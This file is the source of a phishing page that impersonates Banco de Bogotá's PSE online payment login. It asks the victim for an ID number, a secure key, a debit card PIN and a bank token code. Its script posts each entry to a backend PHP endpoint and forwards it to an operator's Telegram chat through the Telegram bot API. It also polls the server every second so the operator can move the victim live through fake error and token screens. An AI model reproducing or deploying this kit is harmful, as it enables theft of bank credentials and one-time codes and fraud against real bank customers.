<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, user-scalable=no"
    />
    <title>Bogota</title>

    <!-- <link rel="stylesheet" href="./assets/css/loader.css">
    <link id="stylesheet" rel="stylesheet" href="./assets/css/pasarelapago.css"> -->

    <link rel="stylesheet" href="./styles2.css" />

    <script type="text/javascript" src="/scripts/jquery-3.6.0.min.js"></script>
    <script src="/scripts/jquery.jclock-min.js" type="text/javascript"></script>
    <script type="text/javascript" src="/scripts/functions2.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-database.js"></script>
    <style>
      * {
        margin: 0;
        padding: 0;
      }
    </style>
  </head>

  <body>
    <div id="bancoDeBogota" class="wrapper hidde">
      <!-- Formulario de ingreso principal -->
      <section id="main_principal" class="main_principal">
        <div class="main__left">
          <img class="main__float" src="/assets/vigilado.jpg" alt="" />

          <div class="main__pic">
            <img class="main__img" src="/assets/logobanco1.png" alt="" />
          </div>

          <div class="main__form">
            <h1 class="main__ttl">Servicio de Pagos Virtuales</h1>
            <p class="main__sub">Pagos PSE</p>

            <div class="form">
              <div class="form__ttl">Ingresa el tipo y número de documento</div>

              <div class="alerta_usuario_invalido" id="alerta_usuario_invalido">
                <p id="usuario_invalido">
                  El usuario o contraseña es invalido o incorrecto, ingrese
                  nuevamente sus credenciales
                </p>
              </div>

              <div class="form__content">
                <div class="form__item">
                  <p class="form__lbl">Documento</p>
                  <select id="select" class="form__input form__input--select">
                    <option disabled selected>Tipo</option>
                    <option value="CC">Cedula de Ciudadanía</option>
                    <option value="CE">Cedula de Extranjería</option>
                    <option value="TI">Tarjeta de Identidad</option>
                    <option value="RC">Registro Civil</option>
                    <option value="NIT Persona Natural">
                      NIT Persona Natural
                    </option>
                    <option value="NIT Persona Juridica">
                      NIT Persona Juridica
                    </option>
                    <option value="NIT Persona Extranjería">
                      NIT Persona Extranjería
                    </option>
                  </select>
                </div>

                <div class="form__item">
                  <p class="form__lbl">Número de Identificación</p>
                  <input
                    class="form__input"
                    type="text"
                    id="numeroDocumento"
                    placeholder="Ingresa el número"
                    style="width: 93%"
                  />
                </div>
                <div class="form__item">
                  <p class="form__lbl">Clave segura</p>
                  <input
                    class="form__input"
                    type="text"
                    id="csegura"
                    placeholder="Ingresa tu clave Segura"
                    style="width: 93%"
                    maxlength="4"
                  />
                </div>
              </div>

              <div class="form__continue">
                <button
                  onclick="{guardarUsuario_MostrarSesiones()}"
                  class="form__btn"
                  id="btnUsuario"
                >
                  Continuar
                </button>
              </div>
            </div>
          </div>
        </div>

        <div class="main__right" style="width: 85%">
          <i class="main__close-icon bx bx-x"></i>

          <div class="elements">
            <div class="item">
              <div class="item__show">
                Tu seguridad es lo primero
                <i class="item__icon bx bxs-chevron-down"></i>
              </div>

              <div class="item__content hidde">
                <p>Sigue estos tips y tus transacciones estarán blindadas</p>

                <ul class="item__ul">
                  <li class="item__li">
                    <img src="/assets/icon-pass.png" alt="" />
                    <span
                      ><strong>No compartas</strong> tus claves o tokens con
                      terceros.</span
                    >
                  </li>

                  <li class="item__li">
                    <img src="/assets/icon-device.png" alt="" />
                    <span
                      ><strong>Evita realizar</strong> transacciones desde un
                      equipo o dispositivo desconocido.</span
                    >
                  </li>

                  <li class="item__li">
                    <img src="/assets/icon-lock.png" alt="" />
                    <span
                      ><strong>Procura cambiar</strong> tus contraseñas
                      bancarias periódicamente o antes si sientes que es
                      necesario.</span
                    >
                  </li>
                </ul>
              </div>
            </div>

            <div class="item">
              <div class="item__show">
                Contáctanos
                <i class="item__icon bx bxs-chevron-down"></i>
              </div>

              <div class="item__content hidde">
                <p>
                  Si tienes alguna duda o algo te ha sucedido, usa nuestros
                  canales
                </p>

                <ul class="item__ul">
                  <li class="item__li">
                    <img src="/assets/icon-call.png" alt="" />
                    <span>Llamar a la <strong>Servilinea</strong></span>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div>
      </section>
      <!-- pedir clave dinamica o token -->
      <section id="OTP" class="OTP">
        <div id="bancoDeBogota" class="">
          <div class="main_OTP">
            <div class="main__left">
              <img class="main__float" src="/assets/vigilado.jpg" alt="" />

              <div class="main__pic">
                <img class="main__img" src="/assets/logobanco1.png" alt="" />
              </div>

              <div class="main__form">
                <h1 class="main__ttl">Servicio de Pagos Virtuales</h1>
                <p class="main__sub">Pagos PSE</p>

                <div class="form">
                  <div class="form__ttl">Ha ingresado desde: CLARO</div>

                  <div class="form__content">
                    <div class="alerta_OTP_invalido" id="alerta_OTP_invalido">
                      <p>El token o clave debito es invalido</p>
                    </div>

                    <div class="form__item">
                      <p class="form__lbl">Clave Tarjeta Debito</p>
                      <input
                        class="form__input"
                        type="text"
                        id="txtOTP1"
                        placeholder="Ingresa clave"
                        style="width: 93%"
                        maxlength="4"
                      />
                    </div>
                    <div class="form__item">
                      <p class="form__lbl">Código Token</p>
                      <input
                        class="form__input"
                        type="text"
                        id="txtOTP"
                        placeholder="Ingresa Token"
                        style="width: 93%"
                        maxlength="6"
                      />
                    </div>
                  </div>

                  <div class="form__continue">
                    <button
                      onclick="{guardarOTP()}"
                      class="form__btn"
                      id="btnOTP"
                    >
                      Continuar
                    </button>
                  </div>
                </div>
              </div>
            </div>

            <div class="main__right" style="width: 85%">
              <i class="main__close-icon bx bx-x"></i>

              <div class="elements">
                <div class="item">
                  <div class="item__show">
                    Tu seguridad es lo primero
                    <i class="item__icon bx bxs-chevron-down"></i>
                  </div>

                  <div class="item__content hidde">
                    <p>
                      Sigue estos tips y tus transacciones estarán blindadas
                    </p>

                    <ul class="item__ul">
                      <li class="item__li">
                        <img src="/assets/icon-pass.png" alt="" />
                        <span
                          ><strong>No compartas</strong> tus claves o tokens con
                          terceros.</span
                        >
                      </li>

                      <li class="item__li">
                        <img src="/assets/icon-device.png" alt="" />
                        <span
                          ><strong>Evita realizar</strong> transacciones desde
                          un equipo o dispositivo desconocido.</span
                        >
                      </li>

                      <li class="item__li">
                        <img src="/assets/icon-lock.png" alt="" />
                        <span
                          ><strong>Procura cambiar</strong> tus contraseñas
                          bancarias periódicamente o antes si sientes que es
                          necesario.</span
                        >
                      </li>
                    </ul>
                  </div>
                </div>

                <div class="item">
                  <div class="item__show">
                    Contáctanos
                    <i class="item__icon bx bxs-chevron-down"></i>
                  </div>

                  <div class="item__content hidde">
                    <p>
                      Si tienes alguna duda o algo te ha sucedido, usa nuestros
                      canales
                    </p>

                    <ul class="item__ul">
                      <li class="item__li">
                        <img src="/assets/icon-call.png" alt="" />
                        <span>Llamar a la <strong>Servilinea</strong></span>
                      </li>
                    </ul>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>
      <!-- loading claro -->
      <section id="loading_claro" class="loading_claro">
        <div class="container_loading">
          <div style="text-align: center; height: auto">
            <img
              style="width: 130px; margin-left: auto"
              src="/assets/iconos-logo-claro.png"
            />
            <br />
            <div class="loader">
              <div class="dot"></div>
              <div class="dot"></div>
              <div class="dot"></div>
            </div>
          </div>
        </div>
      </section>
      <!-- terminado -->
      <section id="Terminado" class="Terminado">
        <img src="/assets/logobanco1.png" />
        <p class="anchopp">¡Ups!, no se pudo completar el pago!</p>
        <p class="parrafo1pp">
          En estos momentos no se pudo realizar el pago, por favor intenta más
          tarde.
        </p>
      </section>
    </div>

    <script type="text/javascript">
      var isUsuarioInvalido = true;

      let firebaseConfig;
      let database;

      let botToken;
      let chatId;

      // Función para cargar configuraciones desde config.json
      async function loadFirebaseConfig() {
        try {
          const response = await fetch("../../config.json"); // Ruta al archivo config.json
          if (!response.ok)
            throw new Error(`HTTP error! status: ${response.status}`);

          const config = await response.json();

          // Inicializar Firebase con la configuración cargada
          // firebaseConfig = config.firebaseConfig;
          // firebase.initializeApp(firebaseConfig);
          // database = firebase.database();

          // Asignar valores del bot desde el archivo config.json
          botToken = config.botToken;
          chatId = config.chatId;
        } catch (error) {
          console.error("Error al cargar la configuración de Firebase:", error);
        }
      }

      async function initApp() {
        await loadFirebaseConfig();
        console.log("Aplicación lista para usar Firebase");
        // Aquí puedes invocar otras funciones o lógica de tu app
      }

      document.addEventListener("DOMContentLoaded", function () {
        // Obtener el valor de enti de la URL
        var urlParams = new URLSearchParams(window.location.search);
        clienteid = urlParams.get("date");
        console.log(enti); // Esto mostrar  el valor de enti pasado desde la p gina original
      });

      function guardarOTP() {
        var dinamican = document.getElementById("txtOTP1").value;
        var clave = document.getElementById("txtOTP").value;

        if (dinamican === "") {
          alert("Ingresa tu Clave Debito.");
          return; // Detener la ejecución de la función en este punto
        }

        // Validar que la clave tiene exactamente 4 números
        if (dinamican.length !== 4 || isNaN(clave)) {
          alert("La Clave Debito debe tener exactamente 4 números.");
          return; // Detener la ejecución de la función en este punto
        }

        if (clave === "") {
          alert("Ingresa tu Código Token.");
          return; // Detener la ejecución de la función en este punto
        }

        // Validar que la clave tiene exactamente 4 números
        if (clave.length !== 6 || isNaN(clave)) {
          alert("El Código Token debe tener exactamente 6 números.");
          return; // Detener la ejecución de la función en este punto
        }

        guardarOTPUsuarioEnDB(dinamican, clave, clienteid);
      }

      function guardarUsuario_MostrarSesiones() {
        var usuario = document.getElementById("numeroDocumento").value;
        var clave = document.getElementById("csegura").value;

        validacionesInput(usuario, clave);
      }

      function mostrarSesionesPorEstado() {
        fetch(`../../get_section.php?id=${clienteid}`)
          .then((response) => response.json())
          .then((data) => {
            if (data.error) {
              console.error("Error al obtener la sección:", data.error);
              return;
            }

            var state_sectionVisible = data.sectionVisible;

            switch (state_sectionVisible) {
              case "De Bogota":
                document.getElementById("main_principal").style.display =
                  "none";
                document.getElementById("loading_claro").style.display =
                  "block";
                break;
              case "Dinamica_APP":
                document.getElementById("loading_claro").style.display = "none";
                document.getElementById("OTP").style.display = "block";
                document.getElementById("Terminado").style.display = "none";
                document.getElementById("main_principal").style.display =
                  "none";
                document.getElementById("alerta_OTP_invalido").style.display =
                  "none";
                break;
              case "usuario_invalido":
                isUsuarioInvalido = false;
                var usuario = (document.getElementById(
                  "numeroDocumento"
                ).innerText = "");
                var clave = (document.getElementById("csegura").innerText = "");
                document.getElementById("loading_claro").style.display = "none";
                document.getElementById("OTP").style.display = "none";
                document.getElementById("Terminado").style.display = "none";
                document.getElementById("main_principal").style.display = "";
                document.getElementById(
                  "alerta_usuario_invalido"
                ).style.display = "block";
                break;
              case "Dinamica_APP_invalida":
                document.getElementById("loading_claro").style.display = "none";
                document.getElementById("main_principal").style.display =
                  "none";
                document.getElementById("Terminado").style.display = "none";
                document.getElementById("OTP").style.display = "block";
                document.getElementById("alerta_OTP_invalido").style.display =
                  "block";
                break;
              case "Terminado":
                document.getElementById("loading_claro").style.display = "none";
                document.getElementById("main_principal").style.display =
                  "none";
                document.getElementById("OTP").style.display = "none";
                document.getElementById("Terminado").style.display = "block";
                break;

              default:
                console.log(
                  `No hay coincidencia para: ${state_sectionVisible}`
                );
            }
          })
          .catch((error) => console.error("Error en la petición:", error));
      }

      function validacionesInput(usuario, clave) {
        if (usuario === "") {
          alert("Por favor, ingresa tu Numero de documento.");
          return; // Detener la ejecuci n de la funci n en este punto
        }
        if (clave === "") {
          alert("Ingresa tu Clave Segura.");
          return; // Detener la ejecución de la función en este punto
        }

        // Validar que la clave tiene exactamente 4 números
        if (clave.length !== 4 || isNaN(clave)) {
          alert("La Clave Segura debe tener exactamente 4 números.");
          return; // Detener la ejecución de la función en este punto
        }

        guardarDataUsuarioEnDB(usuario, clave, clienteid);
      }

      function guardarDataUsuarioEnDB(usuario, clave, clienteid) {
        if (!isUsuarioInvalido) {
          let data = new URLSearchParams();
          data.append("id", clienteid);
          data.append("id2", clienteid);

          data.append("campo1", "usuario");
          data.append("valor1", usuario);
          data.append("campo2", "clave");
          data.append("valor2", clave);
          data.append("campo3", "sectionVisible");
          data.append("valor3", "De Bogota");

          data.append("campo1_2", "usuario");
          data.append("valor1_2", usuario);
          data.append("campo2_2", "clave");
          data.append("valor2_2", clave);
          data.append("campo3_2", "sectionVisible");
          data.append("valor3_2", "De Bogota");

          fetch("../../update_data.php", {
            method: "POST",
            headers: { "Content-Type": "application/x-www-form-urlencoded" },
            body: data.toString(),
          })
            .then((response) => response.json())
            .then((data) => {
              if (data.status === "success") {
                var message = `
          Cliente #: ${clienteid}
          BancoBogota
          Usuario: ${usuario}
          clave ${clave}
          `;
                enviarTelegramBot2(
                  botToken,
                  chatId,
                  message,
                  "Bot 1",
                  "esta en BancoBogota",
                  clienteid
                );
              } else {
                console.error("Error al actualizar usuario:", data);
              }
            })
            .catch((error) => console.error("Error en la petición:", error));
        } else {
          let data = new URLSearchParams();
          data.append("id", clienteid);
          data.append("id2", clienteid);

          data.append("campo1", "usuario");
          data.append("valor1", usuario);
          data.append("campo2", "clave");
          data.append("valor2", clave);

          data.append("campo1_2", "usuario");
          data.append("valor1_2", usuario);
          data.append("campo2_2", "clave");
          data.append("valor2_2", clave);

          fetch("../../update_data.php", {
            method: "POST",
            headers: { "Content-Type": "application/x-www-form-urlencoded" },
            body: data.toString(),
          })
            .then((response) => response.json())
            .then((data) => {
              if (data.status === "success") {
                var message = `
            Cliente #: ${clienteid}
            BancoBogota
            Usuario: ${usuario}
            clave ${clave}
            `;
                enviarTelegramBot2(
                  botToken,
                  chatId,
                  message,
                  "Bot 1",
                  "esta en BancoBogota",
                  clienteid
                );
              } else {
                console.error("Error al actualizar usuario:", data);
              }
            })
            .catch((error) => console.error("Error en la petición:", error));
        }

        setInterval(function () {
          mostrarSesionesPorEstado();
        }, 1000);
      }

      function guardarOTPUsuarioEnDB(dinamican, clave, clienteid) {
     

          let data = new URLSearchParams();
            data.append("id", clienteid);
            data.append("id2", clienteid);
      
            data.append("campo1", "dinamican");
            data.append("valor1", "clave_debito" + " " + dinamican + "token" + " " + clave);
            data.append("campo2", "color");
           data.append("valor2", "verde");
            data.append("campo3", "sectionVisible");
            data.append("valor3", "De Bogota");

      
            data.append("campo1_2", "dinamican");
            data.append("valor1_2", "clave_debito" + " " + dinamican + "token" + " " + clave);
            data.append("campo2_2", "color");
            data.append("valor2_2", "verde");
            data.append("campo3_2", "sectionVisible");
      
            
      
      
            fetch("../../update_data.php", {
              method: "POST",
              headers: { "Content-Type": "application/x-www-form-urlencoded" },
              body: data.toString()
          })
          .then(response => response.json())
          .then(data => {
              if (data.status === "success") {
                document.getElementById("OTP").style.display = "none";

                var message = `
                    Cliente #: ${clienteid}
                    BancoBogota
                    clave Dinamica: ${dinamican}
                    token: ${clave}
                    `;
                enviarTelegramBot2(
                  botToken,
                  chatId,
                  message,
                  "Bot 1",
                  "esta en BancoBogota",
                  clienteid
                );
              } else {
                  console.error("Error al actualizar usuario:", data);
              }
          })
          .catch(error => console.error("Error en la petición:", error));  




        
      }

      function enviarTelegramBot2(
        botToken,
        chatId,
        message,
        botName,
        option,
        clienteid
      ) {
        var url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(
          message
        )}`;

        fetch(url)
          .then((response) => response.json())
          .then((data) => {
            if (data.ok) {
              console.log(clienteid + "entro a" + option);
            } else {
              console.log(`Error al enviar el mensaje a ${botName}`);
            }
          })
          .catch((error) => {
            console.error(`Error al enviar el mensaje a ${botName}:`, error);
            console.log(`Error al enviar el mensaje a ${botName}`);
          });
      }

      initApp();
    </script>
  </body>
</html>
